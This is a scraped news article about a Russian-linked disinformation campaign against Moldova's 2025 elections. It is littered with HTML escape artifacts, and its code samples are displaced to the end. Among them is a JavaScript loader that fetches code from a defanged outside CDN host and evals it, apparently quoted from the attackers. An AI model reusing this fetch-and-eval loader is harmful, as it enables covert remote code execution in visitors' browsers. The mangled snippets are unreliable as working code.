New Russian Disinformation Campaign Targeting Upcoming\u00a0Moldova\u2019s Elections
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
On the eve of Moldova\u2019s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova\u2019s pro-European leadership.<\/p>\n
The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.<\/p>\n
These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova\u2019s democratic process.<\/p>\n
Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.<\/p>\n
Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.<\/p>\n
Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 disinformation<\/a> operation known as Absatz.<\/p>\n By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.<\/p>\n Through deep technical analysis, Silent Push analysts noted<\/a> that the new sites reused several bespoke functions originally developed for the 2022 effort.<\/p>\n These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.<\/p>\n Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.<\/p>\n The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:-<\/p>\n By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.<\/p>\n The campaign\u2019s operators demonstrated advanced persistence<\/a> tactics, carefully architecting their infrastructure to evade conventional detection.<\/p>\n Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.<\/p>\n DNS records were configured with extremely short TTL values\u2014often under five minutes\u2014forcing security teams to constantly refresh caches and complicating takedown efforts.<\/p>\n In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:<\/p>\n This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user\u2019s browser without touching the original domain.<\/p>\n By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.<\/p>\n To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.<\/p>\n The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.<\/p>\n Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.<\/p>\n As Moldova approaches the polls, this campaign<\/a> underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.<\/p>\n Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for proactive defense<\/a> measures.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post New Russian Disinformation Campaign Targeting Upcoming\u00a0Moldova\u2019s Elections<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n[? php\nfunction renderStory($ storyId) {\n $ seed = 'Storm1679';\n $ key = substr (md5($ storyId . $ seed), 0, 8);\n $ templatePath = \"\/var \/www \/html \/templates \/{$ key}_template[.]php\";\n include($ templatePath);\n}\n?]<\/code><\/pre>\nDetection Evasion and Infrastructure Persistence<\/strong><\/h2>\n
[script]\n fetch('https:\/\/cdn.cloudproxy[.]net\/get?siteId=42')\n . then (res =() res[.]text())\n . then (code =() eval (code));\n[\/script]<\/code><\/pre>\n